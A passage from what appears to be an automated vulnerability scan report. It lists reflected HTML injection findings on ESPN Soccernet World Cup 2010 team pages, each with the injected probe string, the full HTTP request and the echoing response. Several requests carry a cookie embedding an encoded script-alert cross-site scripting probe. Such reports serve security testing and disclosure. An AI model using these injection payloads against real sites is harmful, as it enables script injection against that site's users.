GET /worldcup2010/team/_/team/468/slovakia?c864f"><a>dc103401107=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
|
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:25:17 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:25:17 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN07
Cache-Expires: Sat, 06 Nov 2010 23:30:17 GMT
Content-Length: 82085
Connection: close
Via: 8810-09/10
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Slovakia Football /
...[SNIP]...
<a href="/worldcup2010/team?team=468&c864f"><a>dc103401107=1&_slug_=slovakia&c864f">
...[SNIP]...
|
2.35. http://soccernet.espn.go.com/worldcup2010/team/_/team/472/slovenia [REST URL parameter 6]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Firm |
| Host: |
http://soccernet.espn.go.com |
| Path: |
/worldcup2010/team/_/team/472/slovenia |
Issue detail
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69682"><a>ede52c78078 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/472/slovenia69682"><a>ede52c78078 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
|
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:28:12 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:28:12 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN02
Cache-Expires: Sat, 06 Nov 2010 23:33:12 GMT
Content-Length: 81860
Connection: close
Via: 8810-09/10
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Slovenia Football /
...[SNIP]...
<a href="/worldcup2010/team?team=472&_slug_=slovenia69682"><a>ede52c78078&topId=801122&linktext=Slovenia+come+to+terms+with+exit">
...[SNIP]...
|
2.36. http://soccernet.espn.go.com/worldcup2010/team/_/team/472/slovenia [name of an arbitrarily supplied request parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Firm |
| Host: |
http://soccernet.espn.go.com |
| Path: |
/worldcup2010/team/_/team/472/slovenia |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64674"><a>258595f7676 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/472/slovenia?64674"><a>258595f7676=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
|
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:25:20 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:25:20 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN21
Cache-Expires: Sat, 06 Nov 2010 23:30:19 GMT
Content-Length: 81968
Connection: close
Via: 8810-09/10
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Slovenia Football /
...[SNIP]...
<a href="/worldcup2010/team?team=472&64674"><a>258595f7676=1&_slug_=slovenia&64674">
...[SNIP]...
|
2.37. http://soccernet.espn.go.com/worldcup2010/team/_/team/475/switzerland [REST URL parameter 6]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Firm |
| Host: |
http://soccernet.espn.go.com |
| Path: |
/worldcup2010/team/_/team/475/switzerland |
Issue detail
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4db0a"><a>888baac8773 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/475/switzerland4db0a"><a>888baac8773 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
|
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:28:58 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:28:58 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN31
Cache-Expires: Sat, 06 Nov 2010 23:33:58 GMT
Content-Length: 82022
Connection: close
Via: 8810-09/10
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Switzerland Footbal
...[SNIP]...
<a href="/worldcup2010/team?team=475&_slug_=switzerland4db0a"><a>888baac8773&topId=802287&linktext=Hitzfeld+says+pressure+cost+Swiss">
...[SNIP]...
|
2.38. http://soccernet.espn.go.com/worldcup2010/team/_/team/475/switzerland [name of an arbitrarily supplied request parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Firm |
| Host: |
http://soccernet.espn.go.com |
| Path: |
/worldcup2010/team/_/team/475/switzerland |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82f0d"><a>d5df743ea71 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/475/switzerland?82f0d"><a>d5df743ea71=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
|
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:28:17 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:28:17 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN16
Cache-Expires: Sat, 06 Nov 2010 23:33:17 GMT
Content-Length: 82130
Connection: close
Via: 8810-09/10
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Switzerland Footbal
...[SNIP]...
<a href="/worldcup2010/team?team=475&82f0d"><a>d5df743ea71=1&_slug_=switzerland&82f0d">
...[SNIP]...
|
2.39. http://soccernet.espn.go.com/worldcup2010/team/_/team/478/france [REST URL parameter 6]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Firm |
| Host: |
http://soccernet.espn.go.com |
| Path: |
/worldcup2010/team/_/team/478/france |
Issue detail
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa8c8"><a>f460e0de5a0 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/478/francefa8c8"><a>f460e0de5a0 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
|
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:09:31 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:09:31 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN08
Cache-Expires: Sat, 06 Nov 2010 23:14:31 GMT
Content-Length: 80435
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>France Football / S
...[SNIP]...
<a href="/worldcup2010/team?team=478&_slug_=francefa8c8"><a>f460e0de5a0&topId=806664&linktext=New+France+coach+admits+concerns">
...[SNIP]...
|
2.40. http://soccernet.espn.go.com/worldcup2010/team/_/team/478/france [name of an arbitrarily supplied request parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Firm |
| Host: |
http://soccernet.espn.go.com |
| Path: |
/worldcup2010/team/_/team/478/france |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80bf3"><a>247a72dcc41 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/478/france?80bf3"><a>247a72dcc41=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
|
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:08:24 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:08:24 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN17
Cache-Expires: Sat, 06 Nov 2010 23:13:24 GMT
Content-Length: 80543
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>France Football / S
...[SNIP]...
<a href="/worldcup2010/team?team=478&80bf3"><a>247a72dcc41=1&_slug_=france&80bf3">
...[SNIP]...
|
2.41. http://soccernet.espn.go.com/worldcup2010/team/_/team/4789/ivory-coast [REST URL parameter 6]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Firm |
| Host: |
http://soccernet.espn.go.com |
| Path: |
/worldcup2010/team/_/team/4789/ivory-coast |
Issue detail
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a81a1"><a>b81a40a8bd9 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/4789/ivory-coasta81a1"><a>b81a40a8bd9 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; 